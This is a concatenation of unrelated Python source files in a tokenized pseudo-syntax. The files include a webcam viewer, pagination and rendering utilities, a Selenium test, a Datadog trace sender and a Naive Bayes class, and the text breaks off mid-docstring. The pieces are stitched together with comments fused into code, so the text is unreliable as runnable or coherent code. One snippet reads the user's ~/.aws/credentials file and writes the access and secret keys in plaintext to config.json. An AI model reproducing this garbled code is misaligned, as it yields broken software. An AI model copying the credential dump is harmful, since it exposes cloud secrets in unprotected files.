<import_stmt>wx<import_stmt>cv2<line_sep>#---------------------------------------------------------------------- # Panel to display image from camera #---------------------------------------------------------------------- <class_stmt>WebcamPanel(wx.Window)# wx.Panel, wx.Control <block_start><def_stmt>__init__ self parent camera fps=15 flip=<false><block_start>wx.Window.__init__(self parent)<line_sep># remember arguments self.camera=camera<line_sep>self.fps=fps<line_sep>self.flip=flip<line_sep># get frame size ret_value,frame=self.camera.read()<line_sep>height,width=frame.shape[:2]<line_sep># resize panel with camera image self.SetSize((width height))<line_sep>#self.SetMinSize( (width, height) ) # resize main window self.GetParent().GetParent().SetSize((width height+37))# needs a fix so that the +37 offset does not have to be added #self.GetGrandParent().SetSize( (width, height+25) ) #self.GetTopLevelParent().SetSize( (width, height+25) ) # wrong parent frame=cv2.cvtColor(frame cv2.COLOR_BGR2RGB)<if_stmt>self.flip<block_start>frame=cv2.flip(frame 1)<block_end># create bitmap with frame self.bmp=wx.BitmapFromBuffer(width height frame)<line_sep># timer to refresh frames self.timer=wx.Timer(self)<line_sep>self.timer.Start(1000./fps)<line_sep># add functions to events self.Bind(wx.EVT_PAINT self.OnPaint)# run when it is needed self.Bind(wx.EVT_TIMER self.NextFrame)<block_end># run by timer <def_stmt>OnPaint self event<block_start>dc=wx.BufferedPaintDC(self)<line_sep>dc.DrawBitmap(self.bmp 0 0)<block_end><def_stmt>NextFrame self event<block_start>ret_value,frame=self.camera.read()<if_stmt>ret_value<block_start>frame=cv2.cvtColor(frame cv2.COLOR_BGR2RGB)<if_stmt>self.flip<block_start>frame=cv2.flip(frame 1)<block_end>self.bmp.CopyFromBuffer(frame)<line_sep>self.Refresh()<block_end><block_end><block_end>#---------------------------------------------------------------------- # Main Window #---------------------------------------------------------------------- <class_stmt>MainWindow(wx.Frame)<block_start><def_stmt>__init__ self camera fps=10<block_start>wx.Frame.__init__(self <none>)<line_sep>self.panel=wx.Panel(self -1)<line_sep># add sizer self.sizer=wx.BoxSizer(wx.VERTICAL)<line_sep>self.panel.SetSizer(self.sizer)<line_sep># add button self.button=wx.Button(self.panel label="CAPTURE")<line_sep>self.button.Bind(wx.EVT_BUTTON self.OnButton)<line_sep>self.sizer.Add(self.button 0 wx.EXPAND)<line_sep># add panel with webcam image self.webcampanel=WebcamPanel(self.panel camera)<line_sep>self.sizer.Add(self.webcampanel 1 wx.EXPAND)<line_sep>#self.sizer.Layout() #self.webcampanel.Layout() #self.Fit() self.Show()<block_end><def_stmt>OnButton self event<block_start>print("TODO: save image in file")<block_end><block_end>#---------------------------------------------------------------------- camera=cv2.VideoCapture(0)<line_sep>app=wx.App()<line_sep>MainWindow(camera)<line_sep>app.MainLoop()<line_sep>
<def_stmt>arg_to_step arg<block_start><if_stmt>isinstance(arg str)<block_start><return>{'run':arg}<block_end><else_stmt><block_start><return>dict(zip(['run' 'parameters' 'cache'] arg))<block_end><block_end><def_stmt>steps *args<block_start><return>[arg_to_step(arg)<for>arg args]<block_end>
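# Usage sketch for the helpers above (the step names and parameters are made up):
# a bare string becomes {'run': ...}; a tuple fills 'run', 'parameters' and 'cache'
# positionally, so shorter tuples simply omit the trailing keys.
pipeline = steps(
    'preprocess.py',
    ('train.py', {'epochs': 10}),
    ('evaluate.py', {'split': 'test'}, True),
)
# pipeline == [
#     {'run': 'preprocess.py'},
#     {'run': 'train.py', 'parameters': {'epochs': 10}},
#     {'run': 'evaluate.py', 'parameters': {'split': 'test'}, 'cache': True},
# ]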
<import_stmt>numpy<as>np<import_stmt>scipy.stats<as>stats<import_from_stmt>UQpy.Distributions.baseclass.Distribution Distribution<class_stmt>DistributionContinuous1D(Distribution)<block_start>""" Parent class for univariate continuous probability distributions. """<def_stmt>__init__ self **kwargs<block_start>super().__init__(**kwargs)<block_end>@staticmethod<def_stmt>_check_x_dimension x<block_start>""" Check the dimension of input x - must be an ndarray of shape (npoints,) or (npoints, 1) """<line_sep>x=np.atleast_1d(x)<if_stmt>len(x.shape)<g>2<or>(len(x.shape)<eq>2<and>x.shape[1]<ne>1)<block_start><raise>ValueError('Wrong dimension in x.')<block_end><return>x.reshape((-1 ))<block_end><def_stmt>_construct_from_scipy self scipy_name=stats.rv_continuous<block_start>self.cdf=<lambda>x:scipy_name.cdf(x=self._check_x_dimension(x) **self.params)<line_sep>self.pdf=<lambda>x:scipy_name.pdf(x=self._check_x_dimension(x) **self.params)<line_sep>self.log_pdf=<lambda>x:scipy_name.logpdf(x=self._check_x_dimension(x) **self.params)<line_sep>self.icdf=<lambda>x:scipy_name.ppf(q=self._check_x_dimension(x) **self.params)<line_sep>self.moments=<lambda>moments2return='mvsk':scipy_name.stats(moments=moments2return **self.params)<line_sep>self.rvs=<lambda>nsamples=1 random_state=<none>:scipy_name.rvs(size=nsamples random_state=random_state **self.params).reshape((nsamples 1))<def_stmt>tmp_fit dist data<block_start>data=self._check_x_dimension(data)<line_sep>fixed_params={}<for_stmt>key,value dist.params.items()<block_start><if_stmt>value<is><not><none><block_start>fixed_params['f'+key]=value<block_end><block_end>params_fitted=scipy_name.fit(data=data **fixed_params)<line_sep><return>dict(zip(dist.order_params params_fitted))<block_end>self.fit=<lambda>data:tmp_fit(self data)<block_end><block_end>
<import_from_stmt>malaya_speech.utils check_file load_graph generate_session nodes_session <import_from_stmt>malaya_speech.model.tf UNET UNETSTFT UNET1D<def_stmt>load model module quantized=<false> **kwargs<block_start>path=check_file(file=model module=module keys={'model':'model.pb'} quantized=quantized **kwargs )<line_sep>g=load_graph(path['model'] **kwargs)<line_sep>inputs=['Placeholder']<line_sep>outputs=['logits']<line_sep>input_nodes,output_nodes=nodes_session(g inputs outputs)<line_sep><return>UNET(input_nodes=input_nodes output_nodes=output_nodes sess=generate_session(graph=g **kwargs) model=model name=module )<block_end><def_stmt>load_stft model module instruments quantized=<false> **kwargs<block_start>path=check_file(file=model module=module keys={'model':'model.pb'} quantized=quantized **kwargs )<line_sep>g=load_graph(path['model'] **kwargs)<line_sep>inputs=['Placeholder']<line_sep>outputs=[f'logits_{i}'<for>i range(len(instruments))]<line_sep>input_nodes,output_nodes=nodes_session(g inputs outputs)<line_sep><return>UNETSTFT(input_nodes=input_nodes output_nodes=output_nodes instruments=instruments sess=generate_session(graph=g **kwargs) model=model name=module )<block_end><def_stmt>load_1d model module quantized=<false> **kwargs<block_start>path=check_file(file=model module=module keys={'model':'model.pb'} quantized=quantized **kwargs )<line_sep>g=load_graph(path['model'] **kwargs)<line_sep>inputs=['Placeholder']<line_sep>outputs=['logits']<line_sep>input_nodes,output_nodes=nodes_session(g inputs outputs)<line_sep><return>UNET1D(input_nodes=input_nodes output_nodes=output_nodes sess=generate_session(graph=g **kwargs) model=model name=module )<block_end>
<import_from_stmt>skrf.vi.vna rs_zva<class_stmt>Analyzer(rs_zva.ZVA)<block_start>DEFAULT_VISA_ADDRESS="GPIB::16::INSTR"<line_sep>NAME="Rohde & Schwarz ZVA"<line_sep>NPORTS=4<line_sep>NCHANNELS=32<line_sep>SCPI_VERSION_TESTED=''<block_end>
# Copyright (c) 2015 Presslabs SRL # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_future_stmt> absolute_import<import_from_stmt>rest_framework.pagination PageNumberPagination<import_from_stmt>rest_framework.response Response<import_from_stmt>rest_framework.settings api_settings<import_from_stmt>rest_framework.utils.urls replace_query_param remove_query_param<class_stmt>LinkHeaderPagination(PageNumberPagination)<block_start>page_size=api_settings.PAGE_SIZE<or>30<line_sep>page_size_query_param='page_size'<line_sep>max_page_size=100<def_stmt>get_last_link self<block_start>url=self.request.build_absolute_uri()<line_sep>page_number=self.page.paginator.num_pages<line_sep><return>replace_query_param(url self.page_query_param page_number)<block_end><def_stmt>get_first_link self display_page_query_param=<true><block_start>url=self.request.build_absolute_uri()<if_stmt>display_page_query_param<block_start>page_number=self.page.paginator.validate_number(1)<line_sep><return>replace_query_param(url self.page_query_param page_number)<block_end><else_stmt><block_start><return>remove_query_param(url self.page_query_param)<block_end><block_end><def_stmt>get_paginated_response self data<block_start>next_url=self.get_next_link()<line_sep>previous_url=self.get_previous_link()<line_sep>first_url=self.get_first_link()<line_sep>last_url=self.get_last_link()<if_stmt>next_url<is><not><none><and>previous_url<is><not><none><block_start>link='<{next_url}>; rel="next", <{previous_url}>; rel="prev"'<block_end><elif_stmt>next_url<is><not><none><block_start>link='<{next_url}>; rel="next"'<block_end><elif_stmt>previous_url<is><not><none><block_start>link='<{previous_url}>; rel="prev"'<block_end><else_stmt><block_start>link=''<block_end><if_stmt>link<block_start>link<augadd>', '<block_end>link<augadd>'<{first_url}>; rel="first", <{last_url}>; rel="last"'<line_sep>link=link.format(next_url=next_url previous_url=previous_url first_url=first_url last_url=last_url)<line_sep>headers={'Link':link}<if>link<else>{}<line_sep><return>Response(data headers=headers)<block_end><block_end>
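# Hypothetical wiring for the paginator above; the dotted path is an assumption,
# while DEFAULT_PAGINATION_CLASS and PAGE_SIZE are standard Django REST Framework
# settings keys. With this in settings.py, list responses carry an RFC 5988 style
# header such as:
#   Link: <https://api.example.com/items/?page=2>; rel="next", <https://api.example.com/items/?page=1>; rel="first", <https://api.example.com/items/?page=7>; rel="last"
REST_FRAMEWORK = {
    'DEFAULT_PAGINATION_CLASS': 'myapp.pagination.LinkHeaderPagination',
    'PAGE_SIZE': 30,
}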
""" categories: Modules,array description: Array deletion not implemented cause: Unknown workaround: Unknown """<import_stmt>array<line_sep>a=array.array('b' (1 2 3))<del_stmt>a[1]<line_sep>print(a)<line_sep>
"""Helper functions for Philips Hue v2."""<import_from_future_stmt> annotations<def_stmt>normalize_hue_brightness brightness:float|<none><arrow>float|<none><block_start>"""Return calculated brightness values."""<if_stmt>brightness<is><not><none># Hue uses a range of [0, 100] to control brightness. <block_start>brightness=float((brightness/255)<times>100)<block_end><return>brightness<block_end><def_stmt>normalize_hue_transition transition:float|<none><arrow>float|<none><block_start>"""Return rounded transition values."""<if_stmt>transition<is><not><none># hue transition duration is in milliseconds and round them to 100ms <block_start>transition=int(round(transition 1)<times>1000)<block_end><return>transition<block_end><def_stmt>normalize_hue_colortemp colortemp:int|<none><arrow>int|<none><block_start>"""Return color temperature within Hue's ranges."""<if_stmt>colortemp<is><not><none># Hue only accepts a range between 153..500 <block_start>colortemp=min(colortemp 500)<line_sep>colortemp=max(colortemp 153)<block_end><return>colortemp<block_end>
<import_stmt>os<line_sep>os.makedirs('./img/' exist_ok=<true>)<line_sep>IMAGE_URL="https://mofanpy.com/static/img/description/learning_step_flowchart.png"<def_stmt>urllib_download <block_start><import_from_stmt>urllib.request urlretrieve<line_sep>urlretrieve(IMAGE_URL './img/image1.png')# whole document <block_end><def_stmt>request_download <block_start><import_stmt>requests<line_sep>r=requests.get(IMAGE_URL)<with_stmt>open('./img/image2.png' 'wb')<as>f<block_start>f.write(r.content)# whole document <block_end><block_end><def_stmt>chunk_download <block_start><import_stmt>requests<line_sep>r=requests.get(IMAGE_URL stream=<true>)# stream loading <with_stmt>open('./img/image3.png' 'wb')<as>f<block_start><for_stmt>chunk r.iter_content(chunk_size=32)<block_start>f.write(chunk)<block_end><block_end><block_end>urllib_download()<line_sep>print('download image1')<line_sep>request_download()<line_sep>print('download image2')<line_sep>chunk_download()<line_sep>print('download image3')<line_sep>
<import_from_stmt>configparser ConfigParser<import_stmt>os<import_stmt>json<line_sep>obj={}<line_sep>config=ConfigParser()<line_sep>config.read(os.path.join(os.getenv("HOME") ".aws" "credentials"))<line_sep>obj["MY_ACCESS_KEY"]=config.get("default" "aws_access_key_id" fallback="")<line_sep>obj["MY_SECRET_KEY"]=config.get("default" "aws_secret_access_key" fallback="")<with_stmt>open("config.json" "w")<as>out<block_start>json.dump(obj out)<block_end>
# nuScenes dev-kit. # Code written by <NAME>, 2020. <import_stmt>argparse<import_stmt>gc<import_stmt>os<import_stmt>random<import_from_stmt>typing List<import_from_stmt>collections defaultdict<import_stmt>cv2<import_stmt>tqdm<import_from_stmt>nuimages.nuimages NuImages<def_stmt>render_images nuim:NuImages mode:str='all' cam_name:str=<none> log_name:str=<none> sample_limit:int=50 filter_categories:List[str]=<none> out_type:str='image' out_dir:str='~/Downloads/nuImages' cleanup:bool=<true><arrow><none><block_start>""" Render a random selection of images and save them to disk. Note: The images rendered here are keyframes only. :param nuim: NuImages instance. :param mode: What to render: "image" for the image without annotations, "annotated" for the image with annotations, "trajectory" for a rendering of the trajectory of the vehicle, "all" to render all of the above separately. :param cam_name: Only render images from a particular camera, e.g. "CAM_BACK". :param log_name: Only render images from a particular log, e.g. "n013-2018-09-04-13-30-50+0800". :param sample_limit: Maximum number of samples (images) to render. Note that the mini split only includes 50 images. :param filter_categories: Specify a list of object_ann category names. Every sample that is rendered must contain annotations of any of those categories. :param out_type: The output type as one of the following: 'image': Renders a single image for the image keyframe of each sample. 'video': Renders a video for all images/pcls in the clip associated with each sample. :param out_dir: Folder to render the images to. :param cleanup: Whether to delete images after rendering the video. Not relevant for out_type == 'image'. """<line_sep># Check and convert inputs. <assert_stmt>out_type<in>['image' 'video'] ' Error: Unknown out_type %s!'%out_type<line_sep>all_modes=['image' 'annotated' 'trajectory']<assert_stmt>mode<in>all_modes+['all'] 'Error: Unknown mode %s!'%mode<assert_stmt><not>(out_type<eq>'video'<and>mode<eq>'trajectory') 'Error: Cannot render "trajectory" for videos!'<if_stmt>mode<eq>'all'<block_start><if_stmt>out_type<eq>'image'<block_start>modes=all_modes<block_end><elif_stmt>out_type<eq>'video'<block_start>modes=[m<for>m all_modes<if>m<not><in>['annotated' 'trajectory']]<block_end><else_stmt><block_start><raise>Exception('Error: Unknown mode %s!'%mode)<block_end><block_end><else_stmt><block_start>modes=[mode]<block_end><if_stmt>filter_categories<is><not><none><block_start>category_names=[c['name']<for>c nuim.category]<for_stmt>category_name filter_categories<block_start><assert_stmt>category_name<in>category_names 'Error: Invalid object_ann category %s!'%category_name<block_end><block_end># Create output folder. out_dir=os.path.expanduser(out_dir)<if_stmt><not>os.path.isdir(out_dir)<block_start>os.makedirs(out_dir)<block_end># Filter by camera. sample_tokens=[s['token']<for>s nuim.sample]<if_stmt>cam_name<is><not><none><block_start>sample_tokens_cam=[]<for_stmt>sample_token sample_tokens<block_start>sample=nuim.get('sample' sample_token)<line_sep>key_camera_token=sample['key_camera_token']<line_sep>sensor=nuim.shortcut('sample_data' 'sensor' key_camera_token)<if_stmt>sensor['channel']<eq>cam_name<block_start>sample_tokens_cam.append(sample_token)<block_end><block_end>sample_tokens=sample_tokens_cam<block_end># Filter by log. 
<if_stmt>log_name<is><not><none><block_start>sample_tokens_cleaned=[]<for_stmt>sample_token sample_tokens<block_start>sample=nuim.get('sample' sample_token)<line_sep>log=nuim.get('log' sample['log_token'])<if_stmt>log['logfile']<eq>log_name<block_start>sample_tokens_cleaned.append(sample_token)<block_end><block_end>sample_tokens=sample_tokens_cleaned<block_end># Filter samples by category. <if_stmt>filter_categories<is><not><none># Get categories in each sample. <block_start>sd_to_object_cat_names=defaultdict(<lambda>:set())<for_stmt>object_ann nuim.object_ann<block_start>category=nuim.get('category' object_ann['category_token'])<line_sep>sd_to_object_cat_names[object_ann['sample_data_token']].add(category['name'])<block_end># Filter samples. sample_tokens_cleaned=[]<for_stmt>sample_token sample_tokens<block_start>sample=nuim.get('sample' sample_token)<line_sep>key_camera_token=sample['key_camera_token']<line_sep>category_names=sd_to_object_cat_names[key_camera_token]<if_stmt>any([c<in>category_names<for>c filter_categories])<block_start>sample_tokens_cleaned.append(sample_token)<block_end><block_end>sample_tokens=sample_tokens_cleaned<block_end># Get a random selection of samples. random.shuffle(sample_tokens)<line_sep># Limit number of samples. sample_tokens=sample_tokens[:sample_limit]<line_sep>print('Rendering %s for mode %s to folder %s...'%(out_type mode out_dir))<for_stmt>sample_token tqdm.tqdm(sample_tokens)<block_start>sample=nuim.get('sample' sample_token)<line_sep>log=nuim.get('log' sample['log_token'])<line_sep>log_name=log['logfile']<line_sep>key_camera_token=sample['key_camera_token']<line_sep>sensor=nuim.shortcut('sample_data' 'sensor' key_camera_token)<line_sep>sample_cam_name=sensor['channel']<line_sep>sd_tokens=nuim.get_sample_content(sample_token)<line_sep># We cannot render a video if there are missing camera sample_datas. <if_stmt>len(sd_tokens)<l>13<and>out_type<eq>'video'<block_start>print('Warning: Skipping video for sample token %s, as not all 13 frames exist!'%sample_token)<line_sep><continue><block_end><for_stmt>mode modes<block_start>out_path_prefix=os.path.join(out_dir '%s_%s_%s_%s'%(log_name sample_token sample_cam_name mode))<if_stmt>out_type<eq>'image'<block_start>write_image(nuim key_camera_token mode '%s.jpg'%out_path_prefix)<block_end><elif_stmt>out_type<eq>'video'<block_start>write_video(nuim sd_tokens mode out_path_prefix cleanup=cleanup)<block_end><block_end><block_end><block_end><def_stmt>write_video nuim:NuImages sd_tokens:List[str] mode:str out_path_prefix:str cleanup:bool=<true><arrow><none><block_start>""" Render a video by combining all the images of type mode for each sample_data. :param nuim: NuImages instance. :param sd_tokens: All sample_data tokens in chronological order. :param mode: The mode - see render_images(). :param out_path_prefix: The file prefix used for the images and video. :param cleanup: Whether to delete images after rendering the video. """<line_sep># Loop through each frame to create the video. out_paths=[]<for_stmt>i,sd_token enumerate(sd_tokens)<block_start>out_path='%s_%d.jpg'%(out_path_prefix i)<line_sep>out_paths.append(out_path)<line_sep>write_image(nuim sd_token mode out_path)<block_end># Create video. first_im=cv2.imread(out_paths[0])<line_sep>freq=2# Display frequency (Hz). fourcc=cv2.VideoWriter_fourcc(*'MJPG')<line_sep>video_path='%s.avi'%out_path_prefix<line_sep>out=cv2.VideoWriter(video_path fourcc freq first_im.shape[1::-1])<line_sep># Load each image and add to the video. 
<for_stmt>out_path out_paths<block_start>im=cv2.imread(out_path)<line_sep>out.write(im)<line_sep># Delete temporary image if requested. <if_stmt>cleanup<block_start>os.remove(out_path)<block_end><block_end># Finalize video. out.release()<block_end><def_stmt>write_image nuim:NuImages sd_token:str mode:str out_path:str<arrow><none><block_start>""" Render a single image of type mode for the given sample_data. :param nuim: NuImages instance. :param sd_token: The sample_data token. :param mode: The mode - see render_images(). :param out_path: The file to write the image to. """<if_stmt>mode<eq>'annotated'<block_start>nuim.render_image(sd_token annotation_type='all' out_path=out_path)<block_end><elif_stmt>mode<eq>'image'<block_start>nuim.render_image(sd_token annotation_type='none' out_path=out_path)<block_end><elif_stmt>mode<eq>'trajectory'<block_start>sample_data=nuim.get('sample_data' sd_token)<line_sep>nuim.render_trajectory(sample_data['sample_token'] out_path=out_path)<block_end><else_stmt><block_start><raise>Exception('Error: Unknown mode %s!'%mode)<block_end># Trigger garbage collection to avoid memory overflow from the render functions. gc.collect()<block_end><if_stmt>__name__<eq>'__main__'<block_start>parser=argparse.ArgumentParser(description='Render a random selection of images and save them to disk.')<line_sep>parser.add_argument('--seed' type=int default=42)# Set to 0 to disable. parser.add_argument('--version' type=str default='v1.0-mini')<line_sep>parser.add_argument('--dataroot' type=str default='/data/sets/nuimages')<line_sep>parser.add_argument('--verbose' type=int default=1)<line_sep>parser.add_argument('--mode' type=str default='all')<line_sep>parser.add_argument('--cam_name' type=str default=<none>)<line_sep>parser.add_argument('--log_name' type=str default=<none>)<line_sep>parser.add_argument('--sample_limit' type=int default=50)<line_sep>parser.add_argument('--filter_categories' action='append')<line_sep>parser.add_argument('--out_type' type=str default='image')<line_sep>parser.add_argument('--out_dir' type=str default='~/Downloads/nuImages')<line_sep>args=parser.parse_args()<line_sep># Set random seed for reproducible image selection. <if_stmt>args.seed<ne>0<block_start>random.seed(args.seed)<block_end># Initialize NuImages class. nuim_=NuImages(version=args.version dataroot=args.dataroot verbose=bool(args.verbose) lazy=<false>)<line_sep># Render images. render_images(nuim_ mode=args.mode cam_name=args.cam_name log_name=args.log_name sample_limit=args.sample_limit filter_categories=args.filter_categories out_type=args.out_type out_dir=args.out_dir)<block_end>
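# Hypothetical programmatic use of the render script above, mirroring its __main__
# block; the dataroot and output paths are placeholders.
from nuimages.nuimages import NuImages

nuim = NuImages(version='v1.0-mini', dataroot='/data/sets/nuimages',
                verbose=False, lazy=False)
render_images(nuim, mode='annotated', cam_name='CAM_FRONT', sample_limit=10,
              out_type='image', out_dir='~/Downloads/nuImages')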
<import_from_stmt>kivy.logger Logger<import_from_stmt>kivy.utils platform<line_sep>__version__="2.3.2"<line_sep>_log_message="KivyAuth:"+f" {__version__}"+f' (installed at "{__file__}")'<line_sep>__all__=("login_providers" "auto_login")<line_sep>Logger.info(_log_message)<line_sep>
# coding=utf-8 <import_stmt>logging<import_stmt>random<import_stmt>string<import_stmt>sys<import_stmt>unittest<import_from_stmt>time time sleep<import_stmt>apiritif<import_stmt>os<import_stmt>re<import_from_stmt>selenium webdriver<import_from_stmt>selenium.common.exceptions NoSuchElementException TimeoutException<import_from_stmt>selenium.webdriver.common.by By<import_from_stmt>selenium.webdriver.common.action_chains ActionChains<import_from_stmt>selenium.webdriver.support.ui Select<import_from_stmt>selenium.webdriver.support expected_conditions<as>econd<import_from_stmt>selenium.webdriver.support.wait WebDriverWait<import_from_stmt>selenium.webdriver.common.keys Keys<import_from_stmt>bzt.resources.selenium_extras waiter get_locator<class_stmt>TestSc1(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.vars={}<line_sep>timeout=2.0<line_sep>options=webdriver.FirefoxOptions()<line_sep>profile=webdriver.FirefoxProfile()<line_sep>profile.set_preference('webdriver.log.file' '/somewhere/webdriver.log')<line_sep>options.set_capability('unhandledPromptBehavior' 'ignore')<line_sep>self.driver=webdriver.Firefox(profile options=options)<line_sep>self.driver.implicitly_wait(timeout)<line_sep>apiritif.put_into_thread_store(timeout=timeout func_mode=<false> driver=self.driver windows={} scenario_name='sc1')<block_end><def_stmt>_1_httpsblazedemocomsetup1 self<block_start><with_stmt>apiritif.smart_transaction('https://blazedemo.com/setup1')<block_start>self.driver.get('https://blazedemo.com/setup1')<block_end><block_end><def_stmt>_2_setup2 self<block_start><with_stmt>apiritif.smart_transaction('setup2')<block_start>self.driver.get('https://blazedemo.com/setup2')<line_sep>waiter()<block_end><block_end><def_stmt>_3_httpsblazedemocommain1 self<block_start><with_stmt>apiritif.smart_transaction('https://blazedemo.com/main1')<block_start>self.driver.get('https://blazedemo.com/main1')<block_end><block_end><def_stmt>_4_main2 self<block_start><with_stmt>apiritif.smart_transaction('main2')<block_start>self.driver.get('https://blazedemo.com/main2')<line_sep>waiter()<block_end><block_end><def_stmt>_5_httpsblazedemocomteardown1 self<block_start><with_stmt>apiritif.smart_transaction('https://blazedemo.com/teardown1')<block_start>self.driver.get('https://blazedemo.com/teardown1')<block_end><block_end><def_stmt>_6_teardown2 self<block_start><with_stmt>apiritif.smart_transaction('teardown2')<block_start>self.driver.get('https://blazedemo.com/teardown2')<line_sep>waiter()<block_end><block_end><def_stmt>test_sc1 self<block_start><try_stmt><block_start>self._1_httpsblazedemocomsetup1()<line_sep>self._2_setup2()<line_sep>self._3_httpsblazedemocommain1()<line_sep>self._4_main2()<block_end><finally_stmt><block_start>apiritif.set_stage("teardown")# can't be interrupted self._5_httpsblazedemocomteardown1()<line_sep>self._6_teardown2()<block_end><block_end><def_stmt>tearDown self<block_start><if_stmt>self.driver<block_start>self.driver.quit()<block_end><block_end><block_end>
<import_stmt>platform<import_stmt>requests<class_stmt>DDTransport(object)<block_start>""" DDTransport contains all the logic for sending Traces to Datadog :type trace_addr: str :param trace_addr: trace_addr specifies the host[:port] address of the Datadog Trace Agent. """<def_stmt>__init__ self trace_addr<block_start>self._trace_addr=trace_addr<line_sep>self._headers={"Datadog-Meta-Lang":"python" "Datadog-Meta-Lang-Interpreter":platform.platform() # Following the example of the Golang version it is prefixed # OC for Opencensus. "Datadog-Meta-Tracer-Version":"OC/0.0.1" "Content-Type":"application/json" }<block_end>@property<def_stmt>trace_addr self<block_start>""" specifies the host[:port] address of the Datadog Trace Agent. """<line_sep><return>self._trace_addr<block_end>@property<def_stmt>headers self<block_start>""" specifies the headers that will be attached to HTTP request sent to DD. """<line_sep><return>self._headers<block_end><def_stmt>send_traces self trace<block_start>""" Sends traces to the Datadog Tracing Agent :type trace: dic :param trace: Trace dictionary """<line_sep>requests.post("http://"+self.trace_addr+"/v0.4/traces" json=trace headers=self.headers)<block_end><block_end>
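# Usage sketch for DDTransport above. The agent address is the conventional
# localhost:8126 default, and the payload layout is a rough, hypothetical example of
# a v0.4/traces body (a list of traces, each a list of span dicts); neither is taken
# from the original module.
transport = DDTransport("localhost:8126")
example_trace = [[{
    "trace_id": 123456789,
    "span_id": 987654321,
    "name": "web.request",
    "resource": "/home",
    "service": "my-service",
    "start": 1609459200000000000,   # nanoseconds since epoch
    "duration": 25000000,           # nanoseconds
}]]
transport.send_traces(example_trace)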
# MIT License # # Copyright The SCons Foundation # # Permission is hereby granted, free of charge, to any person obtaining # a copy of this software and associated documentation files (the # "Software"), to deal in the Software without restriction, including # without limitation the rights to use, copy, modify, merge, publish, # distribute, sublicense, and/or sell copies of the Software, and to # permit persons to whom the Software is furnished to do so, subject to # the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY # KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE # WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE # LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION # OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION # WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """Variable type for package Variables. To be used whenever a 'package' may be enabled/disabled and the package path may be specified. Given these options :: x11=no (disables X11 support) x11=yes (will search for the package installation dir) x11=/usr/local/X11 (will check this path for existence) Can be used as a replacement for autoconf's ``--with-xxx=yyy`` :: opts = Variables() opts.Add( PackageVariable( key='x11', help='use X11 installed here (yes = search some places)', default='yes' ) ) ... if env['x11'] == True: dir = ... # search X11 in some standard places ... env['x11'] = dir if env['x11']: ... # build with x11 ... """<import_from_stmt>typing Tuple Callable<import_stmt>SCons.Errors<line_sep>__all__=['PackageVariable' ]<line_sep>ENABLE_STRINGS=('1' 'yes' 'true' 'on' 'enable' 'search')<line_sep>DISABLE_STRINGS=('0' 'no' 'false' 'off' 'disable')<def_stmt>_converter val<block_start>""" """<line_sep>lval=val.lower()<if_stmt>lval<in>ENABLE_STRINGS<block_start><return><true><block_end><if_stmt>lval<in>DISABLE_STRINGS<block_start><return><false><block_end><return>val<block_end><def_stmt>_validator key val env searchfunc<arrow><none><block_start>""" """<line_sep># NB: searchfunc is currently undocumented and unsupported # TODO write validator, check for path <import_stmt>os<if_stmt>env[key]<is><true><block_start><if_stmt>searchfunc<block_start>env[key]=searchfunc(key val)<block_end><block_end><elif_stmt>env[key]<and><not>os.path.exists(val)<block_start><raise>SCons.Errors.UserError('Path does not exist for option %s: %s'%(key val))<block_end><block_end><def_stmt>PackageVariable key help default searchfunc=<none><arrow>Tuple[str str str Callable Callable]<block_start>"""Return a tuple describing a package list SCons Variable. The input parameters describe a 'package list' option. Returns a tuple including the correct converter and validator appended. The result is usable as input to :meth:`Add` . A 'package list' option may either be 'all', 'none' or a pathname string. This information is appended to *help*. """<line_sep># NB: searchfunc is currently undocumented and unsupported help='\n '.join((help '( yes | no | /path/to/%s )'%key))<line_sep><return>(key help default <lambda>k v e:_validator(k v e searchfunc) _converter)<block_end># Local Variables: # tab-width:4 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=4 shiftwidth=4:
# coding=utf-8 <import_stmt>sys<import_from_stmt>teamcity.unittestpy TeamcityTestRunner<if_stmt>sys.version_info<l>(2 7)<block_start><import_from_stmt>unittest2 main TestCase expectedFailure<block_end><else_stmt><block_start><import_from_stmt>unittest main TestCase expectedFailure<block_end><class_stmt>TestSkip(TestCase)<block_start><def_stmt>test_expected_failure self<block_start>self.fail("this should happen unfortunately")<block_end>test_expected_failure=expectedFailure(test_expected_failure)<block_end>main(testRunner=TeamcityTestRunner)<line_sep>
<import_stmt>numpy<as>np<import_from_stmt>sklearn.preprocessing OneHotEncoder<class_stmt>MultinomialNB<block_start>""" Naive Bayes algorithm with discrete inputs Parameters ---------- alpha : float, optional (default=1.) Smooth parameter used in Naive Bayes, default is 1 (which indicates a laplace smoothing) Attributes ---------- enc : OneHotEncoder One-Hot encoder used to transform (discrete) inputs class_log_prior : np.ndarray of float Log class prior used to calculate (linear) prediction feature_log_prob : np.ndarray of float Feature log probability used to calculate (linear) prediction Examples -------- >>> import numpy as np >>> x = np.random.randint(0, 10, [1000, 10]) # Generate feature vectors >>> y = np.random.randint(0, 5, 1000) # Generate labels >>> nb = MultinomialNB().fit(x, y) # fit the model >>> nb.predict(x) # (linear) prediction >>> nb.predict_class(x) # predict labels """<def_stmt>__init__ self alpha=1.<block_start>self.alpha=alpha<line_sep>self.enc=self.class_log_prior=self.feature_log_prob=<none><block_end><def_stmt>fit self x y do_one_hot=<true><block_start>""" Fit the model with x & y Parameters ---------- x : {list of float, np.ndarray of float} Feature vectors used for training Note: features are assumed to be discrete y : {list of float, np.ndarray of float} Labels used for training do_one_hot : bool, optional (default=True) Whether do one-hot encoding on x Returns ------- self : MultinomialNB Returns self. 